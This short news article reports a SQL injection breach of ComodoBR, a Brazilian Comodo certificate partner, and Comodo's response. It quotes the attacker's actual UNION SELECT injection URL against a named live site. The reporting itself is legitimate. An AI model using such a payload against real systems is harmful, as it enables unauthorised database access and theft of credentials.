Another Comodo SSL registrar hacked
ComodoBR, the Brazilian partner of the Comodo Certificate Authority (CA), appears to have fallen victim to an attack. During the incident, parts of the company's database, including customer data and submitted certificate requests, were accessed via SQL injection.
While the certificate requests don't contain any information an attacker could misuse, the incident does present a serious security problem because the database records also contained the access credentials of ComodoBR employees. However, it remains unclear whether unauthorised third parties could have used this information to issue their own certificates. Back in March, a hacker had managed to exploit a vulnerability in the servers of an Italian Comodo partner to issue at least one certificate for an already existing domain, forcing browser developers to deploy an update that blocked those certificates.
The hacker behind the current attack says that he wanted to test the security of other Comodo partners. On Pastebin, the hacker has documented how he used the sqlmap Python tool to track down the SQL injection vulnerabilities. He reportedly used the
https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -
URL to access the database tables.
Comodo has emphasised that its own security was not compromised by the attack. The CA said that resellers and partners have no access to Comodo's databases.
See also:
- Single hacker claims responsibility for Comodo certificate theft, a report from The H.
(crve)